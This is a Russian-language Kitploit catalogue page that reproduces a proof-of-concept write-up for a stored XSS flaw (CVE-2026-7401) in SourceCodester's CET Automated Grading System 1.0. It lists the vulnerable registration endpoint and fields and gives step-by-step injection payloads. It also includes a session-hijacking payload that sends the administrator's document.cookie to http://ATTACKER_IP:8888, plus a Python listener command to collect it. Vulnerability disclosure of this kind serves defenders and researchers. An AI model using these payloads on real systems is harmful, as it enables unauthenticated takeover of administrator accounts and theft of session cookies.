Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-7401-XSS — Доказательство концепции для хранимого XSS в SourceCodester CET Automated Grading System 1.0, демонстрирующее неаутентифицированную инъекцию полезной нагрузки через регистрацию студента, приводящую к перехвату сессии администратора. | Kitploit
Инструменты/GitHubGitHub/xmyronn/cve-2026-7401-xss
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubxmyronn/cve-2026-7401-xss

CVE-2026-7401-XSS

Доказательство концепции для хранимого XSS в SourceCodester CET Automated Grading System 1.0, демонстрирующее неаутентифицированную инъекцию полезной нагрузки через регистрацию студента, приводящую к перехвату сессии администратора.

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Хранимый XSS в CET Automated Grading System — Регистрация студента (без аутентификации → панель администратора)

Детали

ПолеЗначение
ВендорSourceCodester
URL вендораhttps://www.sourcecodester.com
ПродуктCET Automated Grading System с AI Predictive Analytics на PHP и MySQL
URL продуктаhttps://www.sourcecodester.com/php/18686/cet-automated-grading-system-ai-predictive-analytics-php-and-mysql.html
Версия1.0
УязвимостьХранимый межсайтовый скриптинг (XSS)
CWECWE-79
Оценка CVSSv38.8 (Высокая)
Вектор атакиСеть
Требуется аутентификацияНет (самостоятельная регистрация студентов является публичной)
ЖертваАдминистратор
Взаимодействие с пользователемТребуется (администратор посещает панель управления)
ИсследовательImad Alvi
Дата2026-04-13

Затронутый компонент

Файл: PersonalAGS/index.php?action=register (Регистрация студента)
Параметры: student_id, full_name, section, username (POST)
Срабатывание при: PersonalAGS/index.php?action=dashboard (Панель администратора)


Описание

Портал самостоятельной регистрации студентов в CET Automated Grading System 1.0 не выполняет санитизацию и не кодирует вводимые пользователем данные перед сохранением их в базе данных. Неаутентифицированный злоумышленник может зарегистрировать учётную запись студента, внедрив JavaScript-пейлоады в любое поле регистрации. Вредоносный пейлоад сохраняется в базе данных и выполняется в браузере любого администратора, который посещает панель управления, где отображается список зачисленных студентов.

Это критическая цепочка атаки — для внедрения пейлоада не требуется аутентификация, но он выполняется в привилегированном контексте администратора, что позволяет похитить cookie сессии и полностью захватить учётную запись администратора.


Доказательство концепции

Шаг 1 — Переход к регистрации студента (аутентификация не требуется)

Перейдите на публичную страницу самостоятельной регистрации студента:

root@kitploit:~
http://localhost/cet-personalagms/PersonalAGS/index.php?action=register

Шаг 2 — Внедрение XSS-пейлоада в поля регистрации

Заполните все поля XSS-пейлоадами и нажмите Register Account:

  • Номер студенческого билета: "><svg onload=alert(1)>
  • Полное имя: "><svg onload=alert(1)>
  • Секция: "><svg onload=alert(1)>
  • Желаемое имя пользователя: "><svg onload=alert(1)>
Screenshot 2026-04-13 030707

Регистрация проходит успешно — пейлоады сохраняются в базе данных.

Шаг 3 — XSS срабатывает в панели администратора

Когда администратор входит в систему и посещает панель управления, внедрённый пейлоад выполняется немедленно. Появляется всплывающее окно alert, а вёрстка страницы заметно нарушается внедрённым HTML — это подтверждает, что пейлоад отображается без санитизации в панели администратора.

Заголовки секций панели управления также отражают внедрённые значения:

  • 1ST YEAR - SECTION 1ST YEAR" ONMOUSEOVE
  • 3RD YEAR - SECTION " ONLOAD=ALERT(1) X=
Screenshot 2026-04-13 030717

Пейлоад для перехвата сессии

Злоумышленник может повысить эту атаку до полного перехвата сессии администратора, используя следующий пейлоад в полях регистрации:

root@kitploit:~
" onmouseover="new Image().src='http://ATTACKER_IP:8888/?c='+document.cookie" x="

Настройте прослушивающий сервер на машине злоумышленника:

root@kitploit:~
python3 -m http.server 8888

Когда администратор посещает панель управления, cookie его сессии отправляется на сервер злоумышленника, что позволяет полностью захватить учётную запись.


Воздействие

Неаутентифицированный злоумышленник может:

  • Внедрить постоянный JavaScript в панель администратора через публичную регистрацию студентов
  • Похитить cookie сессии администратора и захватить учётную запись администратора
  • Выполнять любые действия администратора от имени жертвы
  • Перенаправлять администраторов на вредоносные страницы
  • Искажать содержимое панели администратора

Для внедрения пейлоада не требуется аутентификация. Атака выполняется автоматически, когда любой администратор посещает панель управления.


Ссылки

  • SourceCodester — CET Automated Grading System
  • CWE-79: Некорректная нейтрализация ввода при генерации веб-страницы.
Скачать инструмент